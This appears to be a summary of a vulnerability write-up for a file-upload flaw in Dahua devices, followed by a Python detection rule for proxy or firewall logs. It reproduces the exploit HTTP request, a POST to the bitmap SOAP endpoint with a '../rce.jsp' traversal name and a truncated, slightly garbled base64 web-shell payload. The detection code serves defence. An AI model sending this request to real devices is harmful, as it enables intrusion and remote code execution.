From this webpage screenshot, the following key information about the vulnerability can be obtained:

- **Vulnerability Name**: dahua_bitmap_fileupload
- **Source**: https://mp.weixin.qq.com/s/OkZk0F9-uNQ1qekE7f-FUg, published on February 19, 2024.
- **Vulnerability Description**: This vulnerability involves the file upload functionality in Dahua devices, allowing malicious file uploads via SOAP requests.

### Key Code Example:

```http
POST /emap/webservice/gis/soap/bitmap HTTP/1.1
Host: 127.0.0.1
Content-Type: text/xml; charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.22

../rce.jsp
PCUgaWYoIjEyMyIuZXFlYWXzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2Q1KSkpeyBq'
```

### Key Points:

- **Request Method**: POST
- **Target Path**: `/emap/webservice/gis/soap/bitmap`
- **Malicious File Path**: `../rce.jsp`, indicating potential directory traversal and arbitrary file upload risks.
- **Payload**: Contains malicious code, likely intended for Remote Code Execution (RCE).

This information indicates that the vulnerability allows attackers to upload malicious files via a specific SOAP request, potentially enabling arbitrary code execution on the target system.
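
The key points above translate directly into a detection rule for proxy or WAF request captures. The following is an added example, not code from the source article or from the vendor: it flags POSTs to the endpoint named above whose body carries a traversal sequence or a JSP file name. The `<file>` element in the sample requests is a constructed placeholder, since the page does not show the real SOAP schema.

```python
import re
from urllib.parse import unquote

ENDPOINT = "/emap/webservice/gis/soap/bitmap"  # target path taken from the page
TRAVERSAL = re.compile(r"\.\.[/\\]")            # ../ or ..\
SCRIPT_EXT = re.compile(r"[\w.-]+\.jspx?\b", re.IGNORECASE)


def inspect_request(raw):
    """Return the reasons a raw HTTP request matches the upload pattern described above."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return []  # not a parseable request line
    method, target = parts[0], parts[1]
    path = unquote(target.split("?", 1)[0]).rstrip("/")
    if method.upper() != "POST" or path != ENDPOINT:
        return []
    # Decode twice so single- and double-URL-encoded traversal is normalised.
    decoded = unquote(unquote(body))
    reasons = []
    if TRAVERSAL.search(decoded):
        reasons.append("traversal sequence in body")
    if SCRIPT_EXT.search(decoded):
        reasons.append("server-side script file name in body")
    return reasons


# Constructed sample requests; <file> is a placeholder, not the product's schema.
BENIGN = (
    "POST /emap/webservice/gis/soap/bitmap HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n\r\n"
    "<file>floor1.png</file>"
)
SUSPECT = BENIGN.replace("floor1.png", "../rce.jsp")
ENCODED = BENIGN.replace("floor1.png", "%2e%2e%2frce.jsp")
OTHER_PATH = SUSPECT.replace("/soap/bitmap", "/soap/other")

if __name__ == "__main__":
    for name, req in [("benign", BENIGN), ("suspect", SUSPECT),
                      ("encoded", ENCODED), ("other path", OTHER_PATH)]:
        print(f"{name}: {inspect_request(req) or 'clean'}")
```

A hit on either reason is worth correlating with new `.jsp` files appearing under the application's web root.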